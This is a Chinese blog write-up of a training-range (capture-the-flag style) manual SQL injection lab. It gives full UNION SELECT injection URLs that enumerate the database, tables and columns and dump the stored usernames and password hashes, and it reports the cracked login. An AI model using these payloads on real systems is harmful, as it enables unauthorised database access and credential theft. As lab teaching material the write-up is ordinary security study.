【墨者靶场】---1、SQL手工注入漏洞测试

最新推荐文章于 2024-07-23 15:42:50 发布
最新推荐文章于 2024-07-23 15:42:50 发布
阅读量267 收藏 4
点赞数
分类专栏: 墨者靶场 文章标签: 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43168364/article/details/106525208
版权

实训目标

  • 掌握SQL注入原理;
  • 了解手工注入的方法;
  • 了解MySQL的数据结构;
  • 了解字符串的MD5加解密;

sql注入的流程

  • 1、判断注入点
  • 2、判断注入类型,是字符型还是数字型
  • 3、判断字段数
  • 4、判断显示位
  • 5、得库名
  • 6、得表名
  • 7、得列名
  • 8、得数据

盲注和报错注入可能不太会用到上面的步骤,但是大致思想都是相同的。

注入步骤

起初以为是在登录窗口进行的POST注入,试了很多次没有成功,后来发现下面还有一个页面
在这里插入图片描述
在这里找到了它的注入点在URL中
在这里插入图片描述
接下来判断注入类型(这里and应该是被过滤了,只能用or)
在这里插入图片描述
在这里插入图片描述
可知为字符型注入点,接下来判断字段数
在这里插入图片描述
在这里插入图片描述
可知字段数为4,接下来判断显示位,回显出了2和3
在这里插入图片描述
得库名,命令:http://219.153.49.228:44202/new_list.php?id=1' union select 1,database(),3,4 --+
在这里插入图片描述得表名,命令:http://219.153.49.228:44202/new_list.php?id=1' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--+
在这里插入图片描述
查看stormgroup_member中的列名,命令:http://219.153.49.228:44202/new_list.php?id=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name="stormgroup_member"--+
在这里插入图片描述
查看name和password中的数据,命令:http://219.153.49.228:44202/new_list.php?id=1' union select 1,group_concat(name,"^",password),3,4 from stormgroup_member --+。注入成功。
在这里插入图片描述
将第二个密码穷举摘要可得,用户名:mozhe 密码:166978。登录得key。
在这里插入图片描述

通地塔
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL手工注入漏洞测试(MySQL数据库-字符型) 墨者学院
zwish的信安之路
04-29 1777
1、打开网页,查看源码,发现停机公告那里有个url,尝试注入一下 2、?id=tingjigonggao' 发现有个函数不满足,会报错,不过既然告诉了是字符型注入,再试一下: ?id=tingjigonggao' and '1'='1 发现成功显示 ?id=tingjigonggao' and '1'='2 显示有误 3、判断列数: ?id=' order by 1# 发现不行 使用?id='...
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
Sa1nZen的博客
08-24 181
SQL手工注入漏洞测试(MySQL数据库-字符型)
SQL注入:pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 1362
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
墨者靶场SQL手工注入漏洞测试(MySQL数据库-字符型)
zyh1588的博客
11-01 213
小白回顾墨者靶场手工注入
墨者靶场SQL手工注入漏洞测试(MySQL数据库)
weixin_46694260的博客
03-23 7249
0x00 前言 学SQL注入也有一段时间了,找了一个在线靶场,这个题目基本上学会最基本的注入原理和方法都能拿下,废话就不多说了,直接来演示吧~菜鸟渗透,大佬勿喷 0x01 过程 首先我们先稍微看一下题目 通过题目我们可以看出靶场环境是Nginx+PHP+MySQL 那我们现在启动、进入靶场 ...
墨者靶场-SQL手工注入漏洞测试(Access数据库)
Sa1nZen的博客
08-26 239
墨者靶场-SQL手工注入漏洞测试(Access数据库)
墨者靶场-SQL手工注入漏洞测试(MongoDB数据库)
Sa1nZen的博客
08-26 224
墨者靶场-SQL手工注入漏洞测试(MongoDB数据库)
SQL手工注入漏洞测试(MySQL数据库-字符型)-墨者
weoptions的博客
12-01 1737
———靶场专栏———分享我的解题过程
墨者靶场SQL手工注入漏洞测试(MySQL数据库)通关思路
zyh1588的博客
11-01 1261
小白回顾墨者靶场sql手工注入
墨者靶场-SQL过滤字符后手工注入漏洞测试(第1题)
shy的博客
11-15 289
墨者学习 By/shy014 进去首页又看到熟悉的公告 通过简单的测试,确定存在sql注入漏洞,但是输入and 1=1 ,and 1=2,order by,union select ,and都没...
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
1. **墨者靶场**:提供了黑盒和白盒环境下的命令执行与代码执行漏洞模拟,帮助测试和学习漏洞利用和防御。 2. **Javaweb-Struts2框架类RCE漏洞**:Struts2框架中的某些版本存在远程代码执行漏洞,通过精心构造的请求...
如何避免蓝屏?轻量部署,安全和业务连续性才能两不误
亚信安全官方账号的博客
07-23 643
轻量部署,安全和业务连续性才能两不误
内网安全:IPC横向
最新发布
8888的博客
07-23 658
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
深入理解Kubescape: Kubernetes安全平台与容器镜像漏洞修复
TechEnthusiast的博客
07-23 246
Kubescape是一个开源的Kubernetes安全平台,由ARMO公司开发并维护。风险分析安全合规性检查配置错误扫描容器镜像漏洞扫描和修复Kubescape的优势在于其全面性和易用性。它不仅能够识别问题,还能提供修复建议,甚至在某些情况下自动进行修复。Kubescape作为一个全面的Kubernetes安全平台,其镜像修复功能为用户提供了强大的工具来应对容器安全挑战。通过自动化的漏洞扫描和修复流程,它大大降低了维护Kubernetes环境安全性的复杂度和工作量。
墨者-sql手工注入漏洞测试
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值